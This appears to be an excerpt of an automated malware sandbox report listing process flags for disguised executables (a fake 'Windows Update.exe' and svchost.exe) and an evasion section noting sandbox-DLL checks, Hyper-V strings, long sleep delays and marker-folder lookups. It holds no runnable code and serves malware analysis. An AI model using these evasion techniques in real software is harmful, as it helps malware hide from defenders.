                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: svchost.exe, svchost.exe, 0000000A.00000002.491311478.0000000003641000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.273163025.0000000002C41000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
                    Source: svchost.exe, 00000004.00000002.259142948.0000000000F32000.00000002.00020000.sdmp, svchost.exe, 0000000A.00000000.254608825.0000000000BC2000.00000002.00020000.sdmp, svchost.exe, 00000013.00000000.267457896.0000000000322000.00000002.00020000.sdmp | Binary or memory string: SBIEDLL.DLL+SOFTWARE\VALVE\STEAM\
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 4884 | Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 4884 | Thread sleep time: -200000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 4884 | Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 3644 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe TID: 3136 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe TID: 476 | Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe TID: 5164 | Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe TID: 3016 | Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe TID: 6276 | Thread sleep count: 1079 > 30
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe TID: 1748 | Thread sleep count: 1121 > 30
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe TID: 5276 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe TID: 464 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6200 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6672 | Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6688 | Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6688 | Thread sleep time: -200000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6692 | Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6688 | Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 7100 | Thread sleep time: -180000s >= -30000s
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe TID: 6696 | Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe TID: 6696 | Thread sleep time: -2600000s >= -30000s
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe TID: 6696 | Thread sleep time: -200000s >= -30000s
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe TID: 6696 | Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 6496 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe TID: 6812 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Thread delayed: delay time: 180000
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Window / User API: threadDelayed 1079
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Window / User API: threadDelayed 1121
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe | Window / User API: threadDelayed 560
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Code function: 7_2_006D3EC6 sldt word ptr [eax]
                    Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: GetAdaptersInfo, 5_2_05292D72
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: GetAdaptersInfo, 5_2_05292D4A
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Thread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Thread delayed: delay time: 120000
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Thread delayed: delay time: 140000
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Thread delayed: delay time: 60000
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Thread delayed: delay time: 120000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Thread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Thread delayed: delay time: 120000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Thread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Thread delayed: delay time: 180000
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe | Thread delayed: delay time: 100000
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | File opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | File opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\gtrewt543w5j4hktjh4lk5qlktresty3\gtry6wy5u54w64get63r3\
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | File opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\gtrewt543w5j4hktjh4lk5qlktresty3\gtry6wy5u54w64get63r3\ty34t43t4t4te45634\CureMe\
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | File opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\gtrewt543w5j4hktjh4lk5qlktresty3\gtry6wy5u54w64get63r3\ty34t43t4t4te45634\
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | File opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\gtrewt543w5j4hktjh4lk5qlktresty3\
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | File opened: C:\Vaccine\4535425425342grt45454s5s4\
                    Source: svchost.exe, 0000000D.00000002.491370590.000001990D661000.00000004.00000001.sdmp | Binary or memory string: @Hyper-V RAW
                    Source: svchost.exe, 0000000D.00000002.490046729.0000019908029000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
                    Source: svchost.exe, 00000004.00000002.262341975.00000000014AE000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.490695793.00000000010E9000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe | Code function: 1_2_00405C6C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe | Code function: 1_2_004052DC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe | Code function: 1_2_004026B9 FindFirstFileA
